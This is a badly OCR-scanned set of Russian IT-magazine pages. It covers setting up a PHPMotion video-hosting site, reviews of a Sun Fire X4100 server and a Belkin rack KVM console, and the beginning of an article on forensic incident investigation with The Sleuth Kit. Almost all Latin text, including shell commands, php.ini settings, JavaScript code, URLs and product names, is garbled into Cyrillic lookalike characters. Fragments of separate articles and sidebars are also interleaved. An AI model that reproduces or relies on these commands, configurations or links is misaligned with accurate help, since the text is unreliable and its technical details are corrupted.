место размещения заносятся в БД, оригинал удаляется (или остается на 
месте). 

Теперь, когда информация о ролике есть в БД, любой посетитель, 
набравший имя ролика в форме поиска или перешедший на страницу с 
перечислением последних добавленных роликов, может увидеть ссыл- 
ку на него (естественно, она генерируется налету, используя значения 
БД). 

После перехода по предложенной ссылке пользователь попадает на 
страницу, содержащую описание ролика и окно флеш-плеера, в кото- 
ром начинает загружаться видео. Обычно это полностью генерируемая 
с нуля страница, содержащая примерно такой код: 

Пример встраивания видео в НТМІ_-страницу 

<!-- Создаем контейнер для объекта --> 

«біѵ іб= " сопбаіпег " ха Кгеб= "йббр : / /деб . абоЪе . сот/ 
біазйріауег " >Себ бйе РІазК Р1ауег</а> бо зее бМз 
ріауег. </біѵ> 

<!-- Импортируем ^аѵазсгірб --> 

<зсгірб буре= " бехб/з аѵазсгірб " згс= " . /з аѵазсгірб/ 
зтлбобд есб . 33 " ></зсгірб> 

<зсгірб буре= " бехб/з аѵазсгірб " > 

/* ріауег. зѵ^б — главный объект для загрузки біѵ */ 

ѵаг оЬзесбІ = пем ЗѴ^РОЬзесб( ' . /3 аѵазсгірб /ріауег . змб ' , 1 

шебіаріауег ' , '400' , '300' , ' 8 ') ; 
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ЗѴІААСК 




РНРМОТІОМіКОНФИГУ- 

РИРОВАНИЕДВИЖКА 

ВИДЕОКОДИНГА 



РИРМОТІОЫ НЕ ОТКРОЕТ ДОСТУП 
К САЙТУ, ПОКА ПРОБЛЕМЫ С ПРА- 
ВАМИ ДОСТУПА НЕ БУДУТ РАЗРЕ- 
ШЕНЫ 




> іпіо 

• РНРтобоп исполь- 
зует движок шаблонов 
ТіпуВиіБігопд [ ѵѵѵѵѵѵ. 
ІіпуЬиІзІгопд.огд ]. 
достаточно гибкий, но 
простой. 

• Пример кодинга ви- 
део с использованием 
ТСтред: 

$ іітред -і ѵісіео. аѵі 
-аг 22050 -аЬ 32к -I 
ііѵ -Ь ЮОк -з 320x240 
-у ѵісіео. ііѵ. 




НТТР://ѴѴѴѴѴѴ 

1Г 

> Ііпкз 

• Некоторые видео- 
провайдеры: 

ѵѵѵѵѵѵ. о оѵа Іа .сот 
ѵѵѵѵѵѵ. ЬгідЬісоѵе. сот 
Ь2Ь.ѵіббІег.сот . 



• Дополнительные 
темы для РНРтойоп 
лежат по адресу ѵѵѵѵѵѵ. 
рЬртобогбетрІаіев. 
сот . 

• Многофункцио- 
нальный модуль 
для Эгираі, превра- 
щающий сайт 

в видеохостинг: 

ЬбрУ/сІгираІ.огд/ 

ргоіесі/йазііѵісіео . 



аЪд есСІ . аббРагат ( ' аііотлзсгіркассезз ' , ' аімау 

з ' ) ; 

аЪд ескі . аббРагат ( ' аііоіліиіізсгееп ' , * Сгие ' ) ; 
окдесРІ . асІсІѴагіаЫе ( 1 мібкЪ.' , ' 3 60 ' ) ; 
окд есРІ . аббѴагіаЫе ( 1 беідіШ ' , ' 3 00 ' ) ; 

/* Шкурка плейера */ 

оЬдесРІ . асІсІѴагіаЫе ( " зкіп" , " . / зкіп/ іазіііоп . 
зѵ\Щ " ) ; 

/* Превью */ 

оЬд есЫ . асІсІѴагіаЫе ( 1 ітаде ' , ' . /ѵісіео/ 
ргеѵіеіл. орд ' ) ; 

/* Источник видео */ 

окф есЫ . асІсІѴагіаЫе ( 1 іііе 1 , ' . . /ѵісіео/ 
УиріЗидіапко . ііѵ ' ) ; 

/* Имя контейнера */ 

обд есЫ . шгіке ( ' сопРаіпег ' ) ; 

</зсгірР> 

И это, как ни странно, все. Превью ролика, обычно отображае- 
мое при его загрузке, а также на страницах поиска и в списках 
роликов, генерируется все тем же скриптом-кодировщиком, а 
его адрес помещается в БД. Это самый примитивный вариант 
видеохостинга, размещенного на одной машине. Он не спосо- 
бен выдержать высокой нагрузки и легко загибается от заливки 
на сайт сразу нескольких роликов. Некоторые скрипты и специ- 
ализированные СМ5 позволяют запускать перекодировщик во 
время наименьшей нагрузки или по расписанию стоп, чтобы 
хоть как-то повысить жизнеспособность сервиса, но это спасает 
лишь на первых порах. Хостинг с высокой посещаемостью 
использует распределенную систему обработки запросов, 
отдачи результатов и загрузки файлов для поддержания 
сервиса на плаву. Организована она примерно так: 

1 . Выделенная машина или несколько машин выступают 
в роли фронтендов — серверов, играющих роль «лица» 
сервиса. Они предназначены только для просмотра НТМБ- 
содержимого сайта (но не самих роликов) . 

2. Множество машин используются для хранения контента. 
Открывая видеоролик через веб-интерфейс сервера-фрон- 
тенда, посетитель фактически получает видео с одного из 
этих серверов. 

3. Для кодирования видео используется другая сеть серве- 
ров. Загруженное пользователями видео попадает на один 
из баіа-серверов, описанных во втором пункте. После этого 
запрос на декодирование уходит к наименее загруженному 
вычислительному серверу (сотрите побе), ответственному 
за преобразование видео в РБѴ. Закончив процесс кодинга, 
он загружает результат обратно на баіа-сервер, извещает 
об этом фронтенд, который теперь может показать ролик 
всем посетителям сайта. 



« с , а* и* і , щ *- 

Ііи|25& — 1 - — 

Д «ІШ І Ч ■ I I !■ - 




ѴОІЛиВЕ.СОМ — ЗАКОНОДАТЕЛЬ мод 



Описанная схема, конечно, намного более сложна и обыч- 
но включает в себя сеть так называемых «управляющих 
серверов», отвечающих за консолидацию работы и связь 
всех машин сети в единую систему, а также технологии, 
используемые в СКГО и облачных вычислениях. Часто в 
качестве хранилища данных, как, впрочем, и вычислитель- 
ных серверов, используются сервисы Атагоп, которые уже 
имеют стойкую, проверенную временем инфраструктуру, 
позволяющую без лишних танцев с бубном объединить 
машины в единый кластер. 

РНРМОТІОЫ — МУЛЬТИМЕДИА-СЕРВИС ИЗ КОРОБКИ 

Самые ленивые могут воспользоваться готовыми реше- 
ниями для организации видеохостинга. Называются они 
Мебіа 5Ьагіп§ СМ5 и предлагают уже сформированную и 
отлаженную инфраструктуру для организации различных 
мультимедиа-порталов, таких как видеохостинги, сервисы 
хранения и обработки изображений, а также веб-радио- 
станции. Наиболее популярное решение в этой области — 
СМ5 РНРМобоп (ѵѵѵѵѵѵ.рЬртоНоп.сот) . 

РНРтогіоп — это мультимедиа-сервис из коробки, 
уже готовый к использованию веб-сайт, позволяю- 
щий посетителям загружать видео (поддерживаются 
почти все кодеки и контейнеры) и аудио-файлы, 
просматривать видео/изображения, прослушивать 
аудио, оставлять комментарии, видеть статистику 
просмотров, списки наиболее популярного контента, 
организовывать группы по интересам, вести тема- 
тические блоги и общаться с другими пользователя- 
ми. Гибкая панель администрирования позволяет 
управлять всем этим через ѵѵеЪ-интерфейс, а система 
шаблонов — подогнать сайт под любой дизайн. Перед 
установкой ты можешь ознакомиться с возможностя- 
ми РНРтогіоп, перейдя на тестовую площадку Ьшр : // 
ѵЗЬеіа.рйртоіііоп.пеі: . 

Перед развертыванием РНРтогіоп нужно позаботиться об 
установке на сервер следующих компонентов: 

Зависимости РНРтоііоп 

РНР 4 . 3 или выше для версии 2 и РНР 5 для версии 
3 (с поддержкой СЫ) 

МуЗОЬ 

МрЗ -кодер ШАМЕ 
ЬіЬодд и ЬіЪѵогЪіз 
Мепсобег и Мріауег 
РРМред-РНР 

рйр-дб версии 2 или выше 
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ТЕСТОВАЯ ПЛОЩАДКА РНРМОТІОЫ 



ПЕРВИЧНАЯ НАСТРОЙКА РНРМОТІОЫ 



в* 






В ЦЬипШ Ілпих все эти компоненты уже есть в репозитории, поэтому для 
их установки достаточно выполнить одну команду: 

$ зисіо аріс-деі: іпзЬаІІ \ 

тузді-зегѵег тузді-сііепр Іате ІіЬоддО \ 

ІіЬѵогЬіз ІіЬѵогЬізО тріауег тепсосіег \ 
арасЬе2 рйр5 рЪр5-дсІ рІірБ-^^тред рйр5-тузд1 \ 
р1ір5-с1і 1іЬарасйе2-тос1-аиРІі-тузд1 

Кроме дополнительных пакетов, РНРтойоп требует особой настройки 
РНР, конфигурационный файл которого должен включать следующие 
строки: 

$ зисіо ѵі/еІс/рИр5/арасИе2/рНр.іпі 

ореп_Ьазе<ііг = 
ир1оасі_тах_^і1езІ2е = 100М 
розР_тах_зІ 2 е = 100М 
тах_ехесиРіоп_Ьіте = 1500 
зеззіоп . дс_тах1і!е1ііте = 14000 
за1е_тос1е = оіі 
епаЫе_с11 = Оп 

Где ир1оасі_тах_Ше5І2е — это максимальный размер загружаемого 
файла, ро$і:_тах_5І2е — максимальный размер РОЗТ'а, тах_ехесийоп_ 
йте — максимальное количество секунд, в течение которых может ис- 
полняться скрипт, 5е55юп.§с_тах1йейте — временной интервал между 
запусками сборщика мусора. Опция епаЫе_с11 активирует функцию 
сіЮ , необходимую для загрузки сторонних бинарных модулей РНР. 
После окончания установки и конфигурирования скачай дистрибу- 
тивный пакет РНРтогіоп ( Ьйр://боѵѵп1оаб5.рігртоі:іоп.сот/Ѵ3.0/ 
рЬрБ/рЬртогіоп.гір) и распакуй его в каталог /ѵагДѵѵѵѵѵ: 

$ ссі /ѵаг 

$ зисіо ипгір /путь/к/рйртоРіоп. гір -х 
$ зисіо гт -гі ѵгмѵі 
$ зисіо тѵ рйртоРіоп шт 
$ зисіо сЬпосі -К 7 55 ѵіѵт/с ді-Ып 

Если ты загружаешь файлы, используя РТР, позаботься о том, чтобы 
следующие файлы и каталоги были загружены в бинарном режиме: 

* /рйрзііііесі/ 

* /сіаззез/сопіід .рйр 

* /асісіопз/сизротргоіііе/рітр . сіазз . рйр 

* /асісіопз/сивѣотргоігііе/ітіех . рйр 



Они закодированы с помощью РНР-модуля РНРзЫеЫ, который 
есть в дистрибутиве РНРтойоп. Скопируй его в каталог /изг/НЪ/ 
рЬр5/20060613+№>: 

$ зисіо ср ѵллм/рйрзіііеісі/ріірзіііеісі. 5 . 2 . ііп /изг/1іЬ/ 

рЪр5 /20060613+113 

И добавь в конец файла /ет/рЬр5/арасЬе2/ріір.іпі строку: 

ехРепзіоп=р!ірзіііе1сі. 5.2. Ііп 

По умолчанию АрасЬе в ЦЪипйі (и БеЪіап) настроен на поиск каталога 
с§і-Ьіп в /изг/ІіЪ, а значит, конфигурацию придется изменить. Открой 
файл /ет/арас1іе2/5Іі:е5-епаЫесі/000-сіеГаи1і: и замени строки /изг/НЬ/ 
с§і-Ъіп на /ѵаг/ѵѵѵѵѵѵ/с§і-Ып. 

РНРтойоп использует арасйе-модуль тосЦгеѵѵтПе, поэтому его вызов 
необходимо добавить в конфиг арасЬе2: 

$ зисіо а2епшосі геѵигііе 

$ зисіо /еіс/іпіі . сі/арасйе2 гезіагі 

Далее открой в браузере страничкѵ ѵѵѵѵѵѵ.твой-сайт.сот/зешр и сле- 
дуй инструкциям помощника. Он проведет тебя через финальные эта- 
пы настройки, включающие настройку доступа через РТР, установку 
правильных прав доступа на файлы и каталоги РНРтойоп, настройку 
доступа к базе МуЗС^Ь, ввод пароля и почтового ящика администра- 
тора и указание дополнительной информации о сайте. После этого 
удали каталог /ѵаг/ѵѵѵѵлл/ЛеШр (иначе РНРтойоп запретит тебе вход) . 
Это, в общем-то, все. Панель администратора находится по адресу 
ѵѵѵѵѵу.твой-сайт.сот/зйеабтіп . С ее помощью можно произвес- 
ти множество настроек, среди которых — внутренние настройки 
РНРтойоп, настройки движка перекодировки (например, битрейт, 
размер видео), возможность натянуть шкурки, управлять контентом и 
многое другое. 

ВЫВОДЫ ѴѴеЪ уже перестал быть статичным и постепенно 
превращается в мощнейшую мультимедийную систему, позво- 
ляющую просматривать видео, слушать музыку, играть в игры, 
проводить видео-конференции. Телевидение и радио уступают 
место интерактивным интернет-технологиям, с помощью кото- 
рых любой человек на Земле может организовать собственный 
телеканал или радиостанцию, сделать их популярными и зараба- 
тывать деньги. Почему бы не воспользоваться такой возможнос- 
тью? Тем более, как ты смог убедиться, создать свой телеканал не 
так уж и сложно, т 
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ЗУИХАСК 



■ ■ ЧАТНАМ ВІЫКЕРТ ЫАтгазѵыАск.ри 




Огненное 





111-сервер Ріге Х4100 
5 ип РігеХ 4 Ю 0 




компании 5 ип: 

> Сетевой интерфейс: 

Четыре порта 1 0/1 00/1 ОООВазе-Т ЕіЬегпеІ: 
Один выделенный порт 1 0/1 ООВазе-Т 
ЕіЬегпеІ 



> Внешние порты ввода-вывода: 

Один асинхронный порт Р 045 ТІА/ЕІА-232-Е 
Один порт 115В 1.1 (спереди ], два порта 05В 
1 .1 (сзади) 



Технические характеристики 
5ипРігеХ4Ю0 

> Процессор: 

До двух одноядерных/двуядерных процессо- 
ров АМО Оріегоп серии 200 
1 Мб кэш -памяти 2 уровня на каждое ядро 

> Память: 

Четыре разъема ОІММ на каждый разъем 
процессора 

Модули памяти О О Р 1 /400 ОІММ с ЕСС- 
коррекцией (1 28-разрядная шина + шина 
данных ЕСС) 

Всего 8 разъемов ОІ ММ, до 1 6 Гб памяти на 
каждый процессор 

> Жесткие диски: 

2,5-дюймовые внутренние жесткие диски 
5А5 с поддержкой «горячей замены» 

До двух жестких дисков с дисководом ЭѴЭ- 
РОМ/СЭ-РѴѴ 

До четырех жестких дисков без дисковода 
ОѴО-РОМ/СО-РѴѴ 

> Поддержка ВАШ: 

Встроенные контроллеры РАЮ 0 и 1 



> Питание: 

Два избыточных блока питания с возмож- 
ностью «горячей замены» 

Максимальная выходная мощность постоян- 
ного тока: 550 Вт 

> Расширение: 

Два внутренних 64- раз рядных низ ко про- 
фильных разъема РСІ-Х М02 
(один разъем 100 МГц, один разъем 133 МГц) 



> Функции управления: 

Интегрированный сервисный процессор 
5ип Іпіедгаіесі ЫдЫз ОіЛ Мападег (НОМ) 

> Исполнение: 

Для установки в 1 9" стойку, высота 1 1I 
Размеры (ВхШхД): 43,8 х 445 х 632 мм 
Масса с набором для установки в стойку: 
18,6кг 



щам ЪглИ*г 
Ьікчн ажШ 

«жрлігечіи ікП-н 
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№1 
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№і-М. ШМНЛ 

\ 2 \ 5*пдІ« 4іг 

АЛЛО 1 0 , іір ? і*п 
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Ріге Х4100 — сервер начального уровня 
на базе одного или двух процессоров А1ѴГО 
Оріегоп серин 200, основные области при- 
менения которого — базы данных, реше- 
ния безопасности, разработка, ѵѵеЬ-серве- 
ры и серверы приложений. 

Сервер может быть оснащен до 32 Гб памяти 
БОШ /400 (16 Гб на каждый процессор) с кор- 
рекцией ошибок. В качестве хранилища дан- 
ных могут быть использованы до четырех 
2,5 м жестких диска с интерфейсом 8А8 и воз- 
можностью «горячей замены». Поддержива- 
ются КАГО-конфигурации уровней 0 и 1 . 
Одна из интереснейших особенностей сер- 
вера: наличие сразу четырех гигабитных 
ЕШегпеі-портов, что наделяет сервер от- 
личной сетевой масштабируемостью. Для 
административных целей также доступен 
выделенный 100-мегабитный ЕіЬегпеІ- 



порт, позволяющий выполнять настройку 
и мониторинг сервера даже в случае недо- 
ступности основных сетевых портов. 
Функциональность сервера легко расши- 
ряется благодаря наличию двух низко- 
профильных разъемов РСІ-Х МБ2 внутри 
корпуса. Наличие двух избыточных блоков 
питания с поддержкой «горячей замены» 
позволяет производить смену блока пита- 
ния, не выключая машину. Это же касается 
вентиляторов. 

8ип Ріге Х4100 обладает одним из лучших 
в своем классе соотношений производи- 
тельность/энергопотребление. Требова- 
ния к энергопотреблению и охлаждению 
до 56% ниже по сравнению с серверами на 
базе процессоров Хеоп. 

Система удаленного управления 8ші 
Іп(е§га(ес1 Іл§1іС8 От Мападег (ІЬОМ) с ин- 
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теграцией СІЛ, ІРМІ или 8NМР позволяетуп- 
равлять сервером удаленно. Она включает 
в себя переключение клавиатурного ввода 
и изображения с переадресацией видео и 
мультимедиа. Администратор сможет об- 
служивать все серверы 8ип Ріге, используя 
пакет ПО 8ип N1 8уз1;ет Мападег, который 
включает поддержку выполнения таких 
действий, как распределение ресурсов, мо- 
ниторинг, установка обновлений и управ- 
ление. 

Официально 8ип заявляет о поддержке 
операционных систем 8о1агіз 10, Кеб 
На* Етегргізе Ілпих 3.0 и 4.0, 8И8Е ІЛЖПХ 
Етегргізе 8егѵег 9, ѴѴіпсіоѵѵз 8егѵег 2003, 
Етегргі§еЕсІШопи8*апсІагсІЕсІШоп,ѴМѵѵаге 
Е8Х2.5.х/3.0.х. 

Цена 8ип Ріге Х4100 составляет около 
120 000 рублей. 
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Веікіп 15" \-С0 Раск Сопзоіе: 
консольудаленного управления и КѴМ-переключатель 
в Щ-корпусе 




> Видео-разрешение: 

2048x1 536 И 85 Гц 

> Входы клавиатуры: 

6-ріптіпіОІЫ (Р5/2), 115В Іуре А 

> Входы мыши: 

6-ріп тіпіОІЫ (Р5/2), 115 В {уре А 



>Тип мыши: 

Р5/2-совместимая 

> Корпус: 

Металлический корпус 

> Размеры: 

482.6 х 44.5 х 736.6 мм 



Технические характеристики 
Веікіп 1 5" І.СВ Раск Сопзоіе: специ- 
фикация КѴМ 

> Электропитание, ѴАС (напряжение по пере- 
менному току): 

90-264 0 47-63 Гц 

> Каскадирование: 

Максимум 1 6 ВАІЧК 

> Максимальное число РС: 

8 на ВАІЧК, 1 28 всего 

> Эмуляция клавиатуры: 

Р5/2&ІЧ5В 

> Эмуляция мыши: 

Р5/2&ІЧ5В 

> Поддерживаемые мониторы: 

Ѵ6А, 5ѴСА, МиШ5упс, І_СО мониторы, кото- 
рые имеют аналоговый вход 



Веікіп 15 м ЬСБ Паск Сопзоіе — это консоль 
удаленного управления и КѴМ-переклю- 
чатель в одном флаконе, который помеща- 
ется в стандартный Ш-отсек 19" стойки. С 
его помощью администратор может уп- 
равлять серверами и центрами обработки 
данных от стойки. 

Среди характеристик самой консоли сле- 
дует отметить 15" экран с максимальным 
разрешением 1024x768, 105-кнопочную 
клавиатуру и тачпад, выполненные в 
стильном корпусе формата «все-в-одном». 



> Компьютерные порты: >Вес: 

Высокоплотный, 50- рі п , 5С5І 2-з1у Іе 13,24 кг 

коннектор 




ѴОА-порты: 

1 5-ріп тип НОРВ 



Веікіп 15" І.СО Каск Сопзоіе: 
спецификация консоли 

Разрешение: 

1024x768 

>Тип клавиатуры: 

1 05-кнопочная, Р5/2-совмес- 



тимая 



При этом вес устройства составляет 13,24 
кг, а размеры 482.6 х 44.5 х 736.6 мм. 
Встроенный КѴМ-переключатель поддер- 
живает эмуляцию Р52 и ІІ8В мыши и клави- 
атуры, мониторы ѴСА, 8ѴСА, МиШ8упс, а 
также ЬСБ-мониторы, имеющие аналого- 
вый выход. Разрешение видео составляет 
2048х1536@85 Гц. Совместно с дополни- 
тельным переключателем КѴМ позволяет 
управлять 256 серверами. 

Рабочая температура устройства состав- 
ляет 0-40° С при влажности от 0 до 80%, при 



этом уровень энергопотребления всегда 
остается на минимуме. 

Цена консоли: 54 000 рублей. 

Отличное решение для администрирования 
серверов , размещенных в стойках с высокой 
плотностью. 

Подробнее о КѴМ -системах можно узнать из 
статьи Криса Касперски «Держи все под кон- 
тролем!», опубликованной в мартовском но- 
мере нс за 2007 год. 
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ЗУИХАСК 



■ ■ СЕРГЕЙ «6ШШЁК» ЯРЕМЧУК 6ВШ0ЕК<©5ѴМАСК.Ки 



По скрытым 
следам 

Расследование инцидентов в ІІпіх и ѴѴіпсіоѵѵз 

В случаеуспешного взлома сервер можетбыть использован для рассыл- 
ки спама, распространения вареза, организации атак на другие хосты, 
крометого, могутбытьукрадены или уничтожены важные корпоратив- 
ные данные. Конечно, своевременный бэкап позволит восстановить 
все в первоначальное состояние, но не факт, что через некоторое время 
инцидент не повторится вновь. Поэтому важно научиться проводить 
компьютерные расследования и определять, что же в действительности 
произошло. 



КОМПЬЮТЕРНЫЕ РАССЛЕДОВАНИЯ Немед 
ленное восстановление системы из резервных 
архивов для продолжения нормальной работы 
сервера — это самая распространенная ошибка. 
Даже если начальник грозно нависает над 
головой, а телефон ломится от звонков возму- 
щенных клиентов, следует на некоторое время 
остановить сервер, сохранить его состояние 
на другой носитель, чтобы затем можно было 
спокойно произвести расследование всех обсто- 
ятельств. Зачем это нужно? Во-первых, чтобы 
ситуация не повторилась, ведь обновление ПО, 
антивирусных баз и т.д. отнюдь не гарантирует 
того, что хакер не использует свой способ для 
повторного проникновения. Во-вторых, нельзя 
четко сказать, когда произошел взлом, поэтому, 
казалось бы, «нормальная» архивная копия уже 
может содержать «черный ход». И, наконец, соб- 
ранная инфа поможет узнать, был ли это взлом 
вообще: может, это системная или человеческая 
ошибка, а может, происки инсайдера. 

Процесс расследования (бі^паі/сотріпег 
Іогепзісз) хорошо описан в книге Уоррена Кру- 
за (ѴѴаггеп С. Кшзе II) и ДжеяХэйзера (Дау С. 
Неізег) «СотртегЕогепзісз: Іпсісіепі: Кезропзе 
Еззепгіаіз», которая является своего рода 
библией для тех, кто занимается подобными 
исследованиями. К сожалению, в русском 
переводе ее нет, в интернете можно найти 
отдельные главы и выдержки из оригинала. 
Само исследование состоит из 5 этапов — под- 
готовка (исследователя), оценка ситуации, сбор 



данных, анализ и отчет. Стандартные инструмен- 
ты, входящие в состав ОС, в большинстве случаев 
могут быть использованы лишь как вспомога- 
тельные. Злоумышленник в первую очередь 
сделает все возможное, чтобы скрыть от них свои 
следы (например, время последнего обращения к 
файлу очень просто изменить, в итоге это может 
помешать исследованию, а полученный результат 
нельзя будет использовать как доказательство) . 
Первое время поиск следов проводился на 
«выключенном компьютере», т.е. создавался 
образ и, используя инструментарий, о котором 
пойдет речь далее, исследователь пытался 
найти следы взлома. Такой метод получил 
название «Беаб апаіузіз». Сегодня ситуация 
несколько другая. Известно, что некоторые 
современные вирусы не оставляют следов на 
жестком диске, яркий пример — червь «ЗС^Ь 
зіаттег», который работает только в ОЗУ, и 
засечь его можно лишь по сетевой активности 
(порт 1434, ЕГОР пакет —400 байт) . Еще один 
момент: в настоящее время повсеместно 
внедряются криптографические средства 
защиты (например в ѴѴіпсІоѵѵз — ВпЬоскег, 
ЕЕ5), и без ключей, хранящихся в ОЗУ, полу- 
чить доступ к защищенной информации нет 
никакой возможности. Поэтому сегодня чаще 
используется анализ на рабочей системе — 
«Ьіѵе апаіузіз», когда собирается полная инфа о 
сетевой активности, приложениях и процес- 
сах. Как ты понимаешь, единой процедуры, 
подходящей для всех случаев, не существует. 



в каждой конкретной ситуации подход сугубо 
индивидуальный. 

Далее посмотрим, при помощи каких инстру- 
ментов и как можно собрать и проанализиро- 
вать данные на скомпрометированном хосте. В 
список первоочередных инструментов должны 
входить: 

• утилиты, позволяющие сохранить посектор- 
ную копию разделов диска; 

• утилиты создания контрольных сумм и циф- 
ровых подписей файлов; 

• перехватчики сетевых пакетов, утилиты ана- 
лиза сетевой активности и сетевых настроек 
системы; 

• средства анализа состояния системы (про- 
цессы, библиотеки и т.п.) 

В зависимости от ситуации состав приложений 
может меняться и подбирается индивидуально. 
Нужно отметить, что в настоящее время сущес- 
твует совсем немного специализированных 
программ проведения расследований. Из ком- 
мерческих продуктов популярны РгсГОізсоѵег 
от Тес1шо1о§у РаЕІтѵѵауз ( \ѵтѵ.ЕесЬраЕЬѵѵаѵ5. 
сот) . ЕпСазе Еогепзіс от СиШапсе Зоітѵѵаге 
(штѵ.еиісіапсезоіиѵаге.сот) и ТЪе Еогепзіс 
Тооікк ( ѵѵѵѵѵѵ.ассеззсІаЕа.сот/ІогепзісііооІкіі:. 
ІіЕтІ) . Некоторые проекты предлагают демки 
ограниченных версий. Например, РкГОізсоѵег 
Вазіс Есіігіоп Егееѵѵаге, которая доступна для 
закачки на сайте Тес1іпо1о§у Раііііѵѵауз, не 
имеет сетевых функций. Но, тем не менее, 
есть ряд продуктов, распространяемых под 
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Ргееѵѵаге-лицензией, возможностей которых вполне достаточно для 
проведения полного анализа. Более того, существуют специализиро- 
ванные дистрибутивы Ілпих, где все нужные утилиты уже собраны и 
настроены. Например, БЕРТ Ілпих ГбеіШпих.пеб) . РСШ СЖІ/Ілпих 
Рогепзіс Вооі СБ (1пх4п6.Ье) , НеІіхЗ (ѵААлѵ.е-Іепзе.сот/ЬеІіх) и другие. 
Кстати, коммерческий вариант НеІіхЗ ( ѵ\ллду.е-іеп5е.сот/Ііе1іхЗрго. 
рЬр) в своем роде уникальный дистрибутив, так как содержит утилиты 
для Ілпих, ѴѴіпсіоѵѵз и Мае 05 X. 

НАБОР БЬЕІЛН КІТ 

Самой первой и поэтому известной утилитой, написанной для Шіх- 
систем, является ТСТ (ТЪе Согопег'з Тооікіт, ѵ\дл/ѵѵ.рогсиріпе.ог^/ 
іогешіез Асі.ЬшіР . ТСТ разработан двумя авторами 5АТАЫ — Бап 
Рашіег и ѴѴіеізе Ѵепета — и представляет собой набор утилит, при 
помощи которых можно произвести как Беасі, так и Ілѵе анализ Шіх- 
системы. Некоторое время проект практически не развивался, поэ- 
тому в специализированных дистрибутивах его заменил ТЬе Зіеигіі 
КіІ (зіеигіікібог^) . Т5К разработан экспертом по безопасности Вгіап 
Саггіег и основан на исходном коде проектов ТСТ и ТСШШз. Сырцы се- 
рьезно переписаны, что позволяет собрать и использовать утилиты в 
Ілпих, Мае 05 X, Су^ѵѵіп, РгееВ5Б, 0репВ50 и 5о1агІ5. При помощи Т5К 
можно проанализировать данные, находящиеся на разделах №ГР5, 

РАТ, Ехі2, РхиЗ, ИР51 и ИР52, а также в образах, созданных командами 
бсі и бсЦгезсие. В состав включены 24 утилиты, большинство из них 
для удобства пользователя разбиты на группы, и имя начинается с 
определенной буквы: 

* Рііе Зузбеш Ьауег (начинаются с б*) — работа с файловой 
системой; 

* Меба Баба Ьауег (і*) — описывает файл или каталог, т.е. 
все, что можно извлечь из іпобе; 

* Баба Бпіб Ьауег (Ык*) — фактическое содержание блоков, 
кластеров , фрагментов ; 

* Рііе Зузбеш боигпаі (з*) — журналы файловой системы; 

* Ѵоіите Зузбеш (ітш*) — анализ разделов, дисковые утилиты 
(бізк_*) . 



Попробуем найти удаленный файл. Для начала запустим утилиту Пз, 
чтобы получить имена файлов и каталогов, в том числе и удаленных. 
Утилита имеет несколько дополнительных параметров, из них стоит 
отметить: 

-а — вывод имен файлов, начинающихся с точки ( . и . . ) , их 
очень любят использовать взломщики для маскировки; 

-б — вывод только удаленных файлов; 

-и — вывод только не удаленных файлов; 

-1 — вывод подробной информации о файле; 

-г — рекурсивный обход каталогов . 

# біз -гб /беѵ/збаі 

Первая буква показывает тип файла, т.е. г-е§и1аг, б-ігесіогу, 1-іпк, з-оскеі 
или не определен (?) . Знак «*» на второй позиции показывает, что 
файл не распределен (удален) . Теперь запросим больше информации о 
конкретном іпобе : 

# ббіпб -а /беѵ/збаі 111 
/ілгіпбомз/зузбет32 /сшб. ехе 

# ізбаб /беѵ/збаі 111 
іпобе : 111 

N 06 АІІосабеб 
иіб / діб: 0/0 
тобе: гмхг-хг-х 
зізе: О 

пит об Ііпкз : О 

# бззбаб /беѵ/збаі 

Чтобы просмотреть данные, соответствующие іпобе, используем ісаі: 

# ісаб /беѵ/збаі 1234 | Іезз 



Проекты, использующие 51еи1:Ь Кіі 
и АШорзу 

Открытость кода 51еибл КП и Аиіорзу позволила интегрировать их в другие решения или задействовать предоставляемые ими возможности. Инс- 
трумент поиска Обуззеу Пі^ііаі Рогепзісз 5еагсІі (ЪазізіесЬ.сот/біщіаІ-Іогепзісз/обѵззеѵ.ІііапІ) способен найти на жестком диске слово, написанное 
на разных языках. Утилита №§і1апі:32 (а^іІегт.пеІ/риЫісагіош 4.ІЦт1) . обладающая графическим интерфейсом, умеет создавать полный образ 
работающей системы ѴѴіп2к/ХР/2кЗ (диски, состояние памяти, процессы и т.п.) Восстановить удаленные файлы очень просто при помощи Регі- 
скрипта Кесоир Оігесіогу Сопіепщ (баѵеЬепк.^ооДера^ез.сот/гесоир.рІ) и ЬазЬ-скрипта РІШПБ — Рііе Шбеіеіег (зІбитрег.зІ.пеі/іипбІ.Ьілп) . 
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СМОТРИМ, ЧТО НАХОДИТСЯ В БЛОКЕ 




> іпбо 

Статью «ЫѵеС Б: 
мощное оружие профи» 
читай в январском 
номере т за 2009 год. 

Информациюо наборе 
51еиѣН Кік также можно 
почерпнув из статьи 
«Свой среди чужих», 
опубликованной в 
ноябрьском номере “г 
за 2009 год. 




ПНТТР://ѴШѴѴ 

■ I 

> Ііпкз 

• РРС3227 
«Ѳиісіеііпез бог 
Еѵібепсе Соііесйоп 
апб Агсбіѵіпд» — 
Нс-есіііог.огд/іп- 
побе5/гбс3227.бхб . 

• Документ, подготов- 
ленный Националь- 
ным институтом юс- 
тиции США (Ыабіопаі 

I пзбібибе оі ОизОсе] 
«Еогепзіс ЕхатіпаОоп 
оі 0 ід іба I Еѵібепсе: 

А 0 и і сіе бог Ьаѵѵ 
Еггіогсетепб» — ѵѵѵѵѵѵ. 
пд гз.доѵЛхШІезІ/ 
пі |/ 1 99408.6x6 . 



Аналогично за вывод данных в конкретном блоке отвечает 
утилита ЫксаЦ Для примера просмотрим один блок и 
сохраним несколько блоков, принадлежащих файлу: 

# ЫксаС -Ъ. /сіеѵ/зсіаі 111 I Іезз 

# ЫксаС 111-120 > оикрик.Ык 

В сформированном образе адрес блока будет отличаться 
от исходного, поэтому вручную найти его непросто. Но это 
и не требуется, чтобы упросить поиск, можно воспользо- 
ваться специальным калькулятором — Ыксаіс. Еще одна 
полезная команда «Ыкіз /беѵ/збаі» позволит просмотреть 
содержимое блоков выбранного раздела диска в удобочи- 
таемом виде. По умолчанию выводятся только нераспреде- 
ленные блоки данных (соответствует ключу '-А'). Сохранив 
вывод Ыкіз в файл, затем можно использовать утилиты 
зітіп^з и §гер для поиска нужных фрагментов. 

# Ыкіз зсіаі.сісі > зсІаІ.ЫкІз 

# зкгіпдз -к б зсІаІ.ЫкІз > зсіаі.зкг 

Теперь в зсіаі.зіг находятся все текстовые строки из образа/ 
раздела вместе сданными, указывающими на смещение 
относительно начала блока. 

В Зіеиніі Кігѵі.63 появилась утилита ттіз. Примечательна 
она тем, что выводит таблицу разделов и показывает, какие 
сектора не используются. Таким образом можно увидеть 
«спрятанные» данные : 

